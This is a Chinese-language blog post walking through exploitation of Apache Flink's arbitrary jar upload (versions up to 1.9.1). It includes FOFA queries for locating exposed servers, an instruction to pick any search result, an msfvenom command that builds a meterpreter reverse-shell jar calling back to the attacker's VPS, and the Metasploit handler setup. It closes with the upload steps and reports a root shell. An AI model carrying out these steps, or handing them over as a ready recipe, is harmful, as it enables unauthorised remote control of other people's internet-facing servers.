2. 程式人生 > 實用技巧 >Apache Flink 任意jar檔案上傳+執行

Apache Flink 任意jar檔案上傳+執行

阿新 發佈:2020-11-23

01 描述

通過部署任意jar包的功能可直接向伺服器新增jar木馬檔案

02 影響範圍

<= 1.9.1

03 fofa語法

app="Apache-Flink"
app="Apache‐Flink" && country="CN"

04 漏洞復現

1.fofa搜尋關鍵字,隨便找一個點進去,選擇最下方的Submit New Job

2.使用msf生成jar格式木馬,LHOST為公網VPS地址

msfvenom ‐p java/meterpreter/reverse_tcp LHOST=**.***.***.**  LPORT=44445 ‐f jar > 44445.jar

3. 公網開啟msf監聽
啟動msf框架

msfconsole


選擇handler模組

use exploit/multi/handler


設定監聽的ip和埠(和生成的木馬相對應) (程式碼中0.0.0.0表示監聽所有流向44445埠的流量) *注意payload不要選錯哦

set lhost 0.0.0.0
set lport 44445
set payload java/meterpreter/reverse_tcp


run或exploit開啟監聽

到此為止關於公網vps監聽就已經設定好了,等待上傳shell jar檔案的連線就好了
4.在apache flink中選擇Add New,選擇木馬jar檔案上傳



5.點選剛剛上傳的木馬檔案

6.選擇submit

7.這時候在返回公網vps發現已經接收到了反彈的meterpreter shell了,getuid檢視許可權為root許可權

友情提示,小夥伴們復現完之後記得清楚一下哦

相關推薦

Apache Flink 任意jar檔案+執行

01 描述 通過部署任意jar包的功能可直接向伺服器新增jar木馬檔案 02 影響範圍 <= 1.9.1

Django實現任意檔案(最簡單的方法)

利用Django實現檔案並且儲存到指定路徑下,其實並不困難,完全不需要用到django的forms,也不需要django的models,就可以實現,下面開始實現。

Tomcat 任意檔案漏洞(CVE-2017-12615)

0x01簡介 2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞,漏洞CVE編號:CVE-2017-12615和CVE-2017-12616,其中 遠端程式碼執行漏洞(CVE-2017-12615) 影響: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修復不

漏洞復現——weblogic任意檔案(cve-2018-2894)

0X01漏洞簡介: Weblogic管理端未授權的兩個頁面存在任意jsp檔案漏洞,進而獲取伺服器許可權。

通達OA任意檔案+檔案包含RCE漏洞復現(附自寫EXP)

一、環境搭建: 下載通達OA的安裝包,根據提示點選下一步安裝即可,安裝完成,訪問本機ip即可

檔案+滾動條操作+執行js程式碼

1、檔案2中場景直接send_keys(file_path)第二種通過三方呼叫(呼叫瀏覽器之外的系統需要進行等待time.sleep())

通達OA11.6任意檔案刪除+檔案組合GetShell

通達OA11.6任意檔案刪除+檔案上傳組合GetShell 漏洞介紹 通達OA(Office Anywhere網路智慧辦公系統)是由北京通達信科科技有限公司自主研發的協同辦公自動化軟體,是與中國企業管理實踐相結合形成的綜合管理辦公平臺

wordpress外掛wpdiscuz任意檔案漏洞分析

下載連結 https://downloads.wordpress.org/plugin/wpdiscuz.7.0.3.zip 測試 環境 windows phpstudy phpstorm

(CVE-2018-2894)Weblogic任意檔案漏洞復現

漏洞說明 Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案漏洞,Weblogic管理端未授權的兩個頁面存在任意jsp檔案漏洞,進而獲取伺服器許可權。

phpcmsv9.0任意檔案漏洞解析

漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

seeyou 致遠OA 任意檔案

訪問:http://xxxx/seeyon/htmlofficeservlet,看到 POC: POST /seeyon/htmlofficeservlet HTTP/1.1 Host: x.x.x.x

編寫客戶端程式, 客戶端.txt檔案(需要對檔案型別進行判斷), 伺服器端用於接收檔案(採用多執行緒), 檔案成功, 服務端給客戶端一個反饋: 檔案成功.

技術標籤:基礎程式碼socket多執行緒 編寫客戶端程式, 客戶端上傳.txt檔案(需要對檔案型別進行判斷), 伺服器端用於接收檔案(採用多執行緒), 檔案上傳成功, 服務端給客戶端一個反饋: 檔案上傳成功.

致遠OA-ajax.do任意檔案漏洞復現

致遠OA-ajax.do任意檔案上傳漏洞復現: 漏洞出現原因: 致遠OA舊版本中某些介面存在未授權訪問,以及部分函式過濾不足,攻擊者通過構造惡意請求,可在無需登入的情況下上傳惡意指令碼,從而控制伺服器

WEB安全第二篇--用檔案搞定伺服器:任意檔案檔案包含與任意目錄檔案遍歷

最近做專心web安全有一段時間了,但是目測後面的活會有些複雜,涉及到更多的中介軟體、底層安全、漏洞研究與安全建設等越來越複雜的東東,所以在這裡想寫一個系列關於web安全基礎以及一些討巧的payload技巧以便於備

任意檔案漏洞

一、介紹 原因是伺服器配置不當或者沒有進行足夠的過濾,使用者可以任意檔案,包括惡意指令碼檔案、exe程式等,這就造成了檔案漏洞。

layui彈框中的檔案執行一次choose的問題記錄

layui彈框中的檔案問題記錄 1.檔案的時候需要先彈出一個層再選擇檔案進行,發現layui.upload一次或者關閉彈框之後在不重新整理頁面的前提下不會執行choose方法了;

phpstudy中apache與php配置大檔案問題記錄

一、問題:小檔案,稍微大一點檔案出現500異常,比較奇怪的一點apache和php的錯誤日誌並無錯誤記錄。

CVE-2018-2894 Weblogic 任意檔案漏洞

0X00-引言 甲方就是上帝,唯甲方主義,淦 0X01-環境搭建 靶機:CentOS Linux 7 攻擊機:windows server 2016 && Kail

E-Office v9 任意檔案 (新)

E-Office v9 任意檔案 E-Office v9 任意檔案 (新) Poc POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1

javaWeb學習總結——檔案、下載

嘿,熊dei,你不得不知道在Web開發中,檔案上傳和下載功能是非常常用的功能,關於檔案上傳,瀏覽器上傳檔案以流的形式傳輸】——>伺服器端——>Servlet獲取上傳檔案的輸入流——>解析請求引數,這一系列過